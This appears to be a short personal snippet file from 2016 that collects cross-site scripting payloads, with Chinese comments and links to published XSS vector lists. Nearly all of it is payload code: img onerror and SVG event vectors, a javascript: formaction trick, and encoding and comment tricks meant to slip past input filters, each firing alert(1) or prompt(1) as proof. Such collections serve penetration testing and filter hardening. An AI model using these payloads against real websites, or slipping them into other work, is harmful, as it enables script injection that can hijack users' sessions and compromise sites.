a1exlism
7/26/2016 - 8:22 AM

XSS_fragment.js

<img src="1" onerror=location="javascript:alert%281%29">


SVG:
<svg xmlns="http://www.w3.org/2000/svg">
  <g onload="javascript:alert(1)"></g>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
  <animation xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg"> 
  <set attributeName="onmouseover" to="alert(1)"/> 
</svg>
<svg xmlns="http://www.w3.org/2000/svg"> 
  <handler xmlns:ev="http://www.w3.org/2001/xml­events" ev:event="load">alert(1)</handler>
</svg>
  
收集的URL:
  /*
    https://github.com/cure53/H5SC
    http://www.codeceo.com/article/12-funny-xss-vector.html
    http://www.freebuf.com/articles/web/20282.html
    https://jiji262.github.io/wooyun_articles/drops/Bypass xss过滤的测试方法.html
    
    实体编码: https://dev.w3.org/html5/html-author/charref
  */
无on事件:
  <form><button formaction=javascript&colon;alert(1)>CLICKME
= ' " 过滤:
  <script>document.write(String.fromCharCode(XSSCode));</script>
= ( ) ; :被同时过滤:
  <svg><script>alert&#40/1/&#41</script>
  |------------------------------------------|
  |---终于知道svg和script一起用是什么感觉了   ---|
  |---     想怎么编码就怎么编码,吊吊吊        ---|
  |---       不过只有HTML编码可用           ---|
  |------------------------------------------|
多行绕过:
  <svg /*I am hidden*/onload=alert(1)
也可以进行编码进一步绕过:
  <svg onload=&NewLine;alert(1)
  &NewLine; &#x0000A; &#10; 第一个又能绕过正则对#的判断
USING document.write()
  document.write(prompt(1));  //以前没怎么碰到过, 也没实验